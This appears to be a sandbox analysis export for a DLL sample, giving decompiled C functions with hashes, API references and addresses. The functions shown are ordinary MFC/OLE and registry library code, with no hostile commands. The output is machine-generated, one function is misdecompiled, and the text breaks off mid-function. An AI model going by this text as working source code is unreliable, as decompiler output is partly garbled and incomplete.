Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
Instruction ID: 834996e4caf1481c9af349bd82c863b941331106e3d5840b272905be7d33e105
Opcode Fuzzy Hash: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
Instruction Fuzzy Hash: D3114875500A04BEEB129BA6CD89CAF7AEDEB89781B104519FA01D9122DA32E981D760

Uniqueness

Uniqueness Score: -1.00%

Function 10010DF8 Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010DF8(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x10048618 = GetSystemMetrics(2) + 1;
				 *0x1004861c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x10010e03
0x10010e09
0x10010e10
0x10010e18
0x10010e22
0x10010e33
0x10010e3d
0x10010e45
0x10010e51

APIs

GetSystemMetrics.USER32 ref: 10010E05
GetSystemMetrics.USER32 ref: 10010E0C
GetSystemMetrics.USER32 ref: 10010E13
GetSystemMetrics.USER32 ref: 10010E1D
GetDC.USER32(00000000), ref: 10010E27
GetDeviceCaps.GDI32(00000000,00000058), ref: 10010E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10010E40
ReleaseDC.USER32 ref: 10010E48

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
Instruction ID: e4bb4a9781883fca1ffd26e7a91d1cf17580d25377b1e53741b6ed809414a6cf
Opcode Fuzzy Hash: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
Instruction Fuzzy Hash: 8DF03671A40714AEF7206F718C8EF2B7BB4EB86B11F01891AE6418F1D1D6B599018F94

Uniqueness

Uniqueness Score: -1.00%

Function 1000E09F Relevance: 10.8, APIs: 7, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E1000E09F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x10045580; // 0xe155dca3
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E1001FBC4(E100338B7, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E1000424F(_t246 + 0x28, E1001044F());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E10004D4A(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E1001587F(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E100054DB(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E1001B444(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E10013723(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E10013CC0( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E10014EA9( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E1000DFFE(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E1001B7A6(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					E10001260( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E1001FBB5(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

0x1000e0a3
0x1000e0a7
0x1000e0ae
0x1000e0b1
0x1000e0b8
0x1000e0c4
0x1000e0c7
0x1000e0ca
0x1000e0d0
0x1000e0d6
0x1000e0d9
0x1000e0dc
0x1000e0df
0x1000e0e7
0x1000e0ed
0x1000e0f4
0x1000e0fe
0x1000e106
0x1000e10e
0x1000e111
0x1000e115
0x1000e119
0x1000e11c
0x1000e11c
0x1000e11f
0x1000e127
0x1000e131
0x1000e140
0x1000e143
0x1000e146
0x1000e149
0x1000e14f
0x1000e157
0x1000e159
0x1000e15b
0x1000e15f
0x1000e164
0x1000e168
0x1000e16e
0x1000e170
0x1000e172
0x1000e175
0x1000e175
0x1000e164
0x1000e178
0x1000e185
0x1000e192
0x1000e195
0x1000e198
0x1000e19b
0x1000e19e
0x1000e1ac
0x1000e1ae
0x1000e1ae
0x1000e1b1
0x1000e1b6
0x1000e1b9
0x1000e1bc
0x1000e242
0x1000e242
0x1000e245
0x00000000
0x00000000
0x00000000
0x00000000
0x1000e1c2
0x1000e1c2
0x1000e1c2
0x1000e1c4
0x1000e1c8
0x1000e1cb
0x1000e1cf
0x1000e1d5
0x1000e1d8
0x1000e20f
0x1000e215
0x1000e218
0x1000e21a
0x1000e21e
0x1000e230
0x1000e230
0x1000e220
0x1000e229
0x1000e229
0x1000e232
0x1000e236
0x1000e1da
0x1000e1dc
0x1000e1df
0x1000e1e4
0x1000e1eb
0x1000e1ee
0x1000e1f6
0x1000e1fb
0x1000e1fe
0x1000e201
0x1000e208
0x1000e208
0x1000e239
0x1000e23f
0x00000000
0x1000e24c
0x1000e24c
0x1000e24c
0x1000e24f
0x1000e256
0x1000e257
0x1000e258
0x1000e262
0x1000e25a
0x1000e25a
0x1000e25a
0x1000e268
0x1000e26a
0x1000e26b
0x1000e271
0x1000e272
0x1000e275
0x1000e289
0x1000e28d
0x1000e290
0x1000e292
0x1000e294
0x1000e297
0x1000e2a0
0x1000e2a9
0x1000e2e8
0x1000e2fc
0x1000e308
0x1000e31b
0x1000e327
0x1000e334
0x1000e340
0x1000e340
0x1000e2a9
0x1000e349
0x1000e34e
0x1000e34e
0x1000e354
0x1000e359
0x1000e3a1
0x1000e35b
0x1000e363
0x1000e365
0x1000e365
0x1000e369
0x1000e36d
0x1000e378
0x1000e382
0x1000e38a
0x1000e38b
0x1000e38c
0x1000e39b
0x1000e39b

APIs

__EH_prolog3.LIBCMT ref: 1000E0B8
MapDialogRect.USER32(?,00000000), ref: 1000E149
SysAllocStringLen.OLEAUT32(?,?), ref: 1000E168
CLSIDFromString.OLE32(?,?,00000000), ref: 1000E25A

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

CLSIDFromProgID.OLE32(?,?,00000000), ref: 1000E262
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 1000E2FC
SysFreeString.OLEAUT32(00000000), ref: 1000E34E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
Instruction ID: a3f1bd5bd1abf24c4919bb55c1ab413f5f44746dc04b4daccf7064a6dc2a22e9
Opcode Fuzzy Hash: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
Instruction Fuzzy Hash: EFB1F3B5900259AFEB04DFA8C984AED7BF4FF08344F05812AFC19A7251E774E994CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A498 Relevance: 10.6, APIs: 7, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1001A498(signed int __eax) {

				asm("lds ebp, [ecx+ecx*8-0x3e]");
				 *__eax =  *__eax | __eax;
			}

0x1001a498
0x1001a49c

APIs

__EH_prolog3.LIBCMT ref: 1001A4A5
_memset.LIBCMT ref: 1001A511

Part of subcall function 1001BDF4: _memset.LIBCMT ref: 1001BDFC

VariantClear.OLEAUT32(?), ref: 1001A551
SysFreeString.OLEAUT32(00000000), ref: 1001A5D2
SysFreeString.OLEAUT32(00000000), ref: 1001A5E1
SysFreeString.OLEAUT32(00000000), ref: 1001A5F0
VariantClear.OLEAUT32(00000000), ref: 1001A605

Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: FreeStringVariant$Clear_memset$CopyH_prolog3
String ID:
API String ID: 883085156-0
Opcode ID: 8efe307d466e5ad2bd9e58318525b016a8e9c94eb04e86a6b61c980abd97e2e1
Instruction ID: 2460c0910b6af0e70cdf8b8acfc3bd982ebf65c9e473ac0d5969ddef550a8511
Opcode Fuzzy Hash: 8efe307d466e5ad2bd9e58318525b016a8e9c94eb04e86a6b61c980abd97e2e1
Instruction Fuzzy Hash: 155114719006099FDB51CFA4C884BEEBBF9FF49304F104519E115EB292DB70E985CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10017235 Relevance: 10.6, APIs: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E10017235(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E1001FBC4(E1003426F, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E1000EC55(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E1000E519();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E1001FC9C(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x1003b21c, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E10020F40(_t97, _t101 - 0x48, 0, 0x20);
						E10020F40(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x1003b19c, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E10004E6E(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E10014F82(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E1000E519();
				}
				_t59 = _t98;
				goto L22;
			}

0x10017235
0x10017235
0x1001723c
0x1001724a
0x10017253
0x10017260
0x10017263
0x1001738a
0x1001738a
0x1001738e
0x10017391
0x10017393
0x10017396
0x10017397
0x10017397
0x1001739c
0x1001739c
0x1001739e
0x100173a3
0x100173a3
0x1001726f
0x100172bc
0x100172bf
0x100172c5
0x00000000
0x00000000
0x100172cb
0x100172d2
0x100172d8
0x100172dd
0x100172df
0x100172e2
0x100172e5
0x100172e7
0x100172ee
0x100172fa
0x100172fc
0x100172fe
0x00000000
0x00000000
0x1001730b
0x10017317
0x1001731c
0x10017321
0x10017324
0x10017326
0x10017329
0x1001732b
0x00000000
0x00000000
0x10017348
0x1001734b
0x1001734e
0x10017354
0x10017357
0x1001735c
0x1001735c
0x1001735e
0x10017361
0x10017366
0x10017366
0x10017368
0x1001736b
0x10017370
0x10017370
0x10017372
0x10017378
0x1001737b
0x1001737e
0x10017380
0x10017380
0x00000000
0x1001737e
0x100172e9
0x100172e9
0x00000000
0x100172e9
0x10017274
0x1001727d
0x10017284
0x10017287
0x1001728a
0x1001728d
0x10017290
0x10017293
0x10017296
0x1001729e
0x00000000
0x00000000
0x100172a0
0x100172a7
0x100172aa
0x100172ac
0x100172af
0x100172b0
0x100172b0
0x100172b5
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 1001723C
VariantClear.OLEAUT32(?), ref: 100172D2
_memset.LIBCMT ref: 1001730B
_memset.LIBCMT ref: 10017317
SysFreeString.OLEAUT32(?), ref: 1001735C
SysFreeString.OLEAUT32(?), ref: 10017366
SysFreeString.OLEAUT32(?), ref: 10017370

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
Instruction ID: 2d0dd3affd8f04fec97c60edc25b67d043c515f8611652d59fdaf26af88a8b29
Opcode Fuzzy Hash: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
Instruction Fuzzy Hash: 66414871900629EFCB01CFA4C8459DEBBB9FF08B50F10851AF529AF155C770AA82CF91

Uniqueness

Uniqueness Score: -1.00%

Function 100072BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E100072BC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10045580; // 0xe155dca3
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E1001FBC4(E1003309F, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000701D(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000702E();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E1001FBB5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E1000563B(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10005500( &_v16,  *(_t100 + 0x54));
						_push(0x10037310);
						_push( &_v16);
						_push( &_v36);
						_t54 = E10007149(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E10007149(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10001260(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E100071AD(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E100071AD(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10001260( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10001260( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10044410;
